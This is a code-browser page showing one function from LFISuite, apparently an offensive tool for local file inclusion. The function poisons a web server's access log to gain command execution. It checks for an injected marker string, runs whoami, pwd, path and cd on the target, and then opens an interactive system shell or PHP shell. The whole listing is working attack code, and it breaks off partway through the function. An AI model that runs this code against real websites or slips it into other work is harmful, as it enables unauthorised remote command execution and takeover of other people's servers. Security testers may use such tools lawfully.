MCPcopy
hub / github.com/D35m0nd142/LFISuite / simpleGETorHEAD

Function simpleGETorHEAD

lfisuite.py:961–1032  ·  view source on GitHub ↗
(keyword, ologurl, logmain)

Source from the content-addressed store, hash-verified

959 exit()
960
961def simpleGETorHEAD(keyword, ologurl, logmain):
962 randStr = generateRandom()
963 send_access_log_cmd("echo %s" %randStr, logmain, keyword)
964
965 if(access_log_reverse):
966 r = requests.get(url,headers=gen_headers, verify=False)
967 else:
968 r = requests.get(ologurl,headers=gen_headers,timeout=15, verify=False)
969
970 resp = r.text
971 print colored("\nTrying to inject the website using simple %s requests." %keyword, "white")
972
973 if(access_control(resp,keyword,randStr)):
974 print "[+] The website seems to be vulnerable. Opening a System Shell..\n"
975 time.sleep(1)
976 cmd = ""
977
978 send_access_log_cmd("whoami", logmain, keyword)
979 whoami = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)
980 send_access_log_cmd("pwd", logmain, keyword)
981 pwd = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)
982
983 access_log_while(whoami,logmain,pwd,ologurl,keyword,False)
984
985 # -------------------------------------------------------------------------------------------
986 else:
987 # check if Windows operating system
988 # ----------------------------------------------------- #
989 send_access_log_cmd("path",logmain,keyword)
990 path = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)
991 time.sleep(1)
992
993 if(checkIfWindows(path)):
994 # trying to get current Windows user by using 'whoami' command
995 send_access_log_cmd("whoami", logmain, keyword)
996 whoami = isUnknown(cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True))
997
998 if("?" in whoami):
999 # Try to get current_user using PHP function 'get_current_user()'
1000 send_access_log_cmd("get_current_user();", logmain, keyword+"_PHP")
1001 whoami = isUnknown(cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True))
1002
1003 send_access_log_cmd("cd", logmain, keyword)
1004 pwd = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)
1005 access_log_while(whoami,logmain,pwd,ologurl,keyword,True)
1006
1007 # ----------------------------------------------------- #
1008
1009 # Try to open an only PHP-based shell
1010 rand_str = generateRandom()
1011
1012 send_access_log_cmd("echo '%s';" %rand_str,logmain,keyword+"_PHP")
1013 resp = (requests.get(ologurl,headers=gen_headers,timeout=15, verify=False)).text
1014 if(access_control(resp,keyword+"_PHP",rand_str)):
1015 print "[+] The website seems to be vulnerable. Opening a Shell.."
1016 time.sleep(1)
1017 onlyPhpPrint()
1018

Callers 1

run_access_logFunction · 0.85

Calls 10

generateRandomFunction · 0.85
send_access_log_cmdFunction · 0.85
access_controlFunction · 0.85
cleanOutputFunction · 0.85
access_log_extFunction · 0.85
access_log_whileFunction · 0.85
checkIfWindowsFunction · 0.85
isUnknownFunction · 0.85
onlyPhpPrintFunction · 0.85
exitFunction · 0.85

Tested by

no test coverage detected